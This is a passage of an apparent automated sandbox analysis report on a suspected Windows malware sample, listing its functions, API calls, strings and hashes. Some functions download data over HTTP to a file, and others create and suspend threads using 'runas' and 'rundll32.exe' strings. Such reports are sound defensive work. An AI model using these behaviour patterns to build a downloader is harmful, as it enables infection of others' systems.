                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateOpen
                                                                                  • String ID:
                                                                                  • API String ID: 436179556-0
                                                                                  • Opcode ID: 6cef45b856f3248b0fe271f9ce17b500d42896899d94af18f60e7875b52b7761
                                                                                  • Instruction ID: 68d7ea391eb72bec488049de8ab8a02da34695d4a777c83c72362bf020001ad9
                                                                                  • Opcode Fuzzy Hash: 6cef45b856f3248b0fe271f9ce17b500d42896899d94af18f60e7875b52b7761
                                                                                  • Instruction Fuzzy Hash: 86C158B0A002049BEB24EF68DC467AE7B71EF81304F50417EE905A73D2D7798A84CBD9
                                                                                  Function 00407214 Relevance: 10.7, APIs: 7, Instructions: 247networkfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00407223
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,?), ref: 004072CC
                                                                                  • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 0040735D
                                                                                  • InternetReadFile.WININET(00000000,00000000,000003FF,?), ref: 004073E4
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004073F5
                                                                                  • InternetCloseHandle.WININET(?), ref: 004073FA
                                                                                  • InternetCloseHandle.WININET(?), ref: 004073FF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandle$FileHttpReadRequest$OpenSend
                                                                                  • String ID:
                                                                                  • API String ID: 856522067-0
                                                                                  • Opcode ID: 8c4f249455e392348cd204618eee89e9ebb374f13ea92d7bf2f6710b1f6ef32d
                                                                                  • Instruction ID: 54ccd4b302471f634896f61291f795926b6a31330816fff46b0b6cdf67003ff0
                                                                                  • Opcode Fuzzy Hash: 8c4f249455e392348cd204618eee89e9ebb374f13ea92d7bf2f6710b1f6ef32d
                                                                                  • Instruction Fuzzy Hash: 18812871A100049FEB18DF68CD84BAE7B65EF85304F60816EF804E72D6D739AD81CB5A
                                                                                  Function 00406F80 Relevance: 10.6, APIs: 7, Instructions: 105networkfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,6F380EF0), ref: 00406FB5
                                                                                  • InternetOpenA.WININET(0042DD45,00000000,00000000,00000000,00000000), ref: 00406FCA
                                                                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00406FEA
                                                                                  • InternetReadFile.WININET(00000000,?,00010000,00010000), ref: 00407001
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407043
                                                                                  • InternetCloseHandle.WININET(?), ref: 00407052
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00407055
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandle$FileOpen$CreateRead
                                                                                  • String ID:
                                                                                  • API String ID: 4113138902-0
                                                                                  • Opcode ID: 7cbbaff30839c73d4a5d46c4e2be895aaf49b5412307e1b590f8447ea00df63d
                                                                                  • Instruction ID: f318055f9b0a6cd492bb822c14f1c3a980a9a8f60db6a67ea6e52dfe8d96c5f1
                                                                                  • Opcode Fuzzy Hash: 7cbbaff30839c73d4a5d46c4e2be895aaf49b5412307e1b590f8447ea00df63d
                                                                                  • Instruction Fuzzy Hash: 7A31B871741208BBEB20CF65DC85FDE3769EB48704F604129F904AB2D1CBB9E9858B69
                                                                                  Function 00417BFC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: api-ms-$ext-ms-
                                                                                  • API String ID: 0-537541572
                                                                                  • Opcode ID: c38fdcf0445f0a7e9b61a3ea2f5f3b23ee6d9f86e4bb16d5dc8db7418dd1f1b0
                                                                                  • Instruction ID: 04feef229c099cf0caa78ce254594ce7b64f47669f0644e3bcc4f4daf5d9c93e
                                                                                  • Opcode Fuzzy Hash: c38fdcf0445f0a7e9b61a3ea2f5f3b23ee6d9f86e4bb16d5dc8db7418dd1f1b0
                                                                                  • Instruction Fuzzy Hash: 1C21D571A4A221ABDB315B249C40ADF37789F417A0F250226EC05B7391FA38DD41C6EC
                                                                                  Function 0041D2F7 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041D2BF: _free.LIBCMT ref: 0041D2E4
                                                                                  • _free.LIBCMT ref: 0041D345
                                                                                    • Part of subcall function 00417051: HeapFree.KERNEL32(00000000,00000000,?,0041614E), ref: 00417067
                                                                                    • Part of subcall function 00417051: GetLastError.KERNEL32(?,?,0041614E), ref: 00417079
                                                                                  • _free.LIBCMT ref: 0041D350
                                                                                  • _free.LIBCMT ref: 0041D35B
                                                                                  • _free.LIBCMT ref: 0041D3AF
                                                                                  • _free.LIBCMT ref: 0041D3BA
                                                                                  • _free.LIBCMT ref: 0041D3C5
                                                                                  • _free.LIBCMT ref: 0041D3D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
                                                                                  • Instruction ID: 9e2e3d3b8b4d9d1074471a71dff7dd876d8a72478f5da9a7b3c948a32c2f96b7
                                                                                  • Opcode Fuzzy Hash: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
                                                                                  • Instruction Fuzzy Hash: E91154B2980B08AAD930B7B2CC47FCB7BAC5F15704F40081EB2A966092D6BFF5C44758
                                                                                  Function 00418EA7 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetConsoleCP.KERNEL32(?,00403FD0,00000000), ref: 00418EEF
                                                                                  • __fassign.LIBCMT ref: 004190CE
                                                                                  • __fassign.LIBCMT ref: 004190EB
                                                                                  • WriteFile.KERNEL32(?,00403FD0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00419133
                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00419173
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041921F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 4031098158-0
                                                                                  • Opcode ID: ea7bbc56c5a124928601a376039a556cda986aa23e9e7feeb770ede6d599fc04
                                                                                  • Instruction ID: 4a1ea9c13593e6146f7ffc2e0f36bb807c69745bf179f96df70c488bbdfcc1e6
                                                                                  • Opcode Fuzzy Hash: ea7bbc56c5a124928601a376039a556cda986aa23e9e7feeb770ede6d599fc04
                                                                                  • Instruction Fuzzy Hash: F8D1AB71D002599FCB15CFA8D8909EDBBB5BF49304F28416AE815FB342D634AE86CB58
                                                                                  Function 7FE432D4 Relevance: 9.1, APIs: 6, Instructions: 73memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,7FE453D0,00000000,7FE42E0C,7FE453D0), ref: 7FE43310
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 7FE4331F
                                                                                  • memcpy.NTDLL(00000000,02263E58,?), ref: 7FE4333F
                                                                                  • memcpy.NTDLL(?,02263E58,00000000), ref: 7FE4336A
                                                                                  • IsBadReadPtr.KERNEL32(?,?), ref: 7FE43391
                                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 7FE433AA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$memcpy$AllocateFreeProcessRead
                                                                                  • String ID:
                                                                                  • API String ID: 722247336-0
                                                                                  • Opcode ID: 552fac5a70bfc6c263aafda12b09075c372027dd2ebab31769e8de2eac42fedc
                                                                                  • Instruction ID: e3500ff868ffef222200554de9f898f7f0b9cc85ff7932ac3d777bba641bc37d
                                                                                  • Opcode Fuzzy Hash: 552fac5a70bfc6c263aafda12b09075c372027dd2ebab31769e8de2eac42fedc
                                                                                  • Instruction Fuzzy Hash: 8F218D76900300EFCB11CFA9D884BAAB7F9FF44349F148459F91AE7111D771A598EB60
                                                                                  Function 0041A25A Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _strrchr
                                                                                  • String ID: I=A
                                                                                  • API String ID: 3213747228-3946403557
                                                                                  • Opcode ID: 186601d8a17e2b5d785641720b47b2babc382d84c469d94d16a1b433b5ce272a
                                                                                  • Instruction ID: 8b9ff17209004a454263f1e9faabe9befd3c5a981dcfe354372e658eaf560767
                                                                                  • Opcode Fuzzy Hash: 186601d8a17e2b5d785641720b47b2babc382d84c469d94d16a1b433b5ce272a
                                                                                  • Instruction Fuzzy Hash: 4BB14532A062559FDB11CF29C8817EEBBE1EF45340F14816BE855DB342D23C9D92CB6A
                                                                                  Function 00411894 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,0041188B,004116F9,00411008), ref: 004118A2
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004118B0
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004118C9
                                                                                  • SetLastError.KERNEL32(00000000,0041188B,004116F9,00411008), ref: 0041191B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  • String ID:
                                                                                  • API String ID: 3852720340-0
                                                                                  • Opcode ID: 997330488df08d38d93276a35cddbdf8f1a131b59de40d2c04e92889589716e3
                                                                                  • Instruction ID: c9659887dbdb8b0ba91e31d86727317a6399b3c023515a7196fbdcefdac90553
                                                                                  • Opcode Fuzzy Hash: 997330488df08d38d93276a35cddbdf8f1a131b59de40d2c04e92889589716e3
                                                                                  • Instruction Fuzzy Hash: 4C0124326193116EE6283776BC85AEB26A4EB013B9730023FF324459F1EF194CC2920C
                                                                                  Function 00402A30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127threadsleepinjectionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0040FC60: Concurrency::cancel_current_task.LIBCPMT ref: 0040FD81
                                                                                  • CreateThread.KERNEL32(00000000,00000000,004029C0,00000000,00000000,00000000), ref: 00402A96
                                                                                  • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,?), ref: 00402AA3
                                                                                  • SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00402AAA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
                                                                                  • String ID: runas$rundll32.exe
                                                                                  • API String ID: 1039963361-4081450877
                                                                                  • Opcode ID: d1592217e4478c5ea545865a8189d5ddc7b0323b2a45d0daecc3dde9ef46f0d2
                                                                                  • Instruction ID: cbe1071344162770b1540c7e30956158cd622aecd0bbe1292944266410e95558
                                                                                  • Opcode Fuzzy Hash: d1592217e4478c5ea545865a8189d5ddc7b0323b2a45d0daecc3dde9ef46f0d2
                                                                                  • Instruction Fuzzy Hash: 4141D371211148ABEF18DF28CE99BDD3B66AF45344F50812AF805A73D6C7BDE9C08B58
                                                                                  Function 004158FB Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 123COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TZ$C:\Users\user\Desktop\S7AGd447vH.exe$`%Y
                                                                                  • API String ID: 0-1243407132
                                                                                  • Opcode ID: 7a9d286b55a6d7791a3b78df8b97bf955a391a67a32cee53b2cda71ea7da64e1
                                                                                  • Instruction ID: 38f4d60b3dc3330eb660a12c1bff0bcf569eb7c8f224e468f879af4f1ba56567
                                                                                  • Opcode Fuzzy Hash: 7a9d286b55a6d7791a3b78df8b97bf955a391a67a32cee53b2cda71ea7da64e1
                                                                                  • Instruction Fuzzy Hash: 7741B3B1A10614EFCB21EB9999819EEBBB8EFC5310F10016BF404D7310D7B48A81D799
                                                                                  Function 0041BEE8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • C:\Users\user\Desktop\S7AGd447vH.exe, xrefs: 0041BEED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: C:\Users\user\Desktop\S7AGd447vH.exe
                                                                                  • API String ID: 0-3472667792
                                                                                  • Opcode ID: c55c4c084ad2c230f635acb70b1e9e70acdd672452902c9fb3f822ecf2e8c030
                                                                                  • Instruction ID: 98b84f3662eafc99a63776aa1d9869d5ad61514731121a2dccbac03ca90b7c9c
                                                                                  • Opcode Fuzzy Hash: c55c4c084ad2c230f635acb70b1e9e70acdd672452902c9fb3f822ecf2e8c030
                                                                                  • Instruction Fuzzy Hash: 132195712041097F9B14AF72CC819EB776CEF00368710491AF929D7651EB39DDD29BE8
                                                                                  Function 0041365B Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wcsrchr
                                                                                  • String ID: .bat$.cmd$.com$.exe
                                                                                  • API String ID: 1752292252-4019086052
                                                                                  • Opcode ID: 77ddbc1fb28f9346dad7768a5891c9b58b5a2fbbf90a09ed820187877b3d27dc
                                                                                  • Instruction ID: 6f70c85177786f58d52e2084dd49b61e1baffeb1d3a2e9057e97d842c7ddf161
                                                                                  • Opcode Fuzzy Hash: 77ddbc1fb28f9346dad7768a5891c9b58b5a2fbbf90a09ed820187877b3d27dc
                                                                                  • Instruction Fuzzy Hash: CA010437B04226322A35551AAE027AB57898B82BB5726402FF854E73C0FE4DDE82019C
                                                                                  Function 00411BA4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: api-ms-
                                                                                  • API String ID: 0-2084034818
                                                                                  • Opcode ID: 1f410769ad7d24a70860011098d06d6ca35ded4aca2c839cfa339bb89b4e2759
                                                                                  • Instruction ID: d3a7a299a8bae97992ab6d63a13964a8bacfe7ebf419c298562bbe63b7ffd96e
                                                                                  • Opcode Fuzzy Hash: 1f410769ad7d24a70860011098d06d6ca35ded4aca2c839cfa339bb89b4e2759
                                                                                  • Instruction Fuzzy Hash: AD11EC31A86725DBC7314B24DD40ADF37549F157A0B110226EA02A73B0FB34DD42C5DC
                                                                                  Function 00412C53 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00412C48,?,?,00412C10,?,?,?), ref: 00412C68
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00412C7B
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00412C48,?,?,00412C10,?,?,?), ref: 00412C9E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: 9b25b2480156a898975ff9207fa4a0d1f543927fad6c89e789778ca8823a3494
                                                                                  • Instruction ID: 35e70594de3343cec193ed4b3efddcf5e0eaadd2cf146d92627de2791e1443f6
                                                                                  • Opcode Fuzzy Hash: 9b25b2480156a898975ff9207fa4a0d1f543927fad6c89e789778ca8823a3494
                                                                                  • Instruction Fuzzy Hash: E4F08230602228FBDB219B50DE09BDEBB75EB00755F550069E505E11A0DFB88E51DAD8
                                                                                  Function 0041628C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00416295
                                                                                    • Part of subcall function 00417051: HeapFree.KERNEL32(00000000,00000000,?,0041614E), ref: 00417067
                                                                                    • Part of subcall function 00417051: GetLastError.KERNEL32(?,?,0041614E), ref: 00417079
                                                                                  • _free.LIBCMT ref: 004162A8
                                                                                  • _free.LIBCMT ref: 004162B9
                                                                                  • _free.LIBCMT ref: 004162CA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID: TZ
                                                                                  • API String ID: 776569668-2456141640
                                                                                  • Opcode ID: a9b7eeb1b825a360286587c7391533d25bf86073c3a630afaaf29fdc71c47209
                                                                                  • Instruction ID: 17f29831d95d5ca339852fbac288bb35cd082703f5dfb087a9833422e99e2c0c
                                                                                  • Opcode Fuzzy Hash: a9b7eeb1b825a360286587c7391533d25bf86073c3a630afaaf29fdc71c47209
                                                                                  • Instruction Fuzzy Hash: F6E04FF0415235AA8B516F12BE439853F31BB09706711616BF41002231C7F641D2AF8C
                                                                                  Function 00413393 Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004132C5), ref: 004133B5
                                                                                  • GetFileInformationByHandle.KERNEL32(?,?), ref: 0041340F
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004132C5,?,000000FF,00000000,00000000), ref: 0041349D
                                                                                  • __dosmaperr.LIBCMT ref: 004134A4
                                                                                  • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 004134E1
                                                                                    • Part of subcall function 00413709: __dosmaperr.LIBCMT ref: 0041373E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                  • String ID:
                                                                                  • API String ID: 1206951868-0
                                                                                  • Opcode ID: 9e75fcf97521c0e012578af4ab8d31cf15f6d097c0de31b8fbb2230b4899aa8c
                                                                                  • Instruction ID: 7a5675e70778044766161b9b0ab71a1d10fa057a0dc66ff984ad03481d502888
                                                                                  • Opcode Fuzzy Hash: 9e75fcf97521c0e012578af4ab8d31cf15f6d097c0de31b8fbb2230b4899aa8c
                                                                                  • Instruction Fuzzy Hash: D1416075900204AFCB25DFA5DC459EFBBF9EF89305B04482EF956D3610EB389A81CB24
                                                                                  Function 0041D256 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0041D26E
                                                                                    • Part of subcall function 00417051: HeapFree.KERNEL32(00000000,00000000,?,0041614E), ref: 00417067
                                                                                    • Part of subcall function 00417051: GetLastError.KERNEL32(?,?,0041614E), ref: 00417079
                                                                                  • _free.LIBCMT ref: 0041D280
                                                                                  • _free.LIBCMT ref: 0041D292
                                                                                  • _free.LIBCMT ref: 0041D2A4
                                                                                  • _free.LIBCMT ref: 0041D2B6
                                                                                  Memory Dump Source
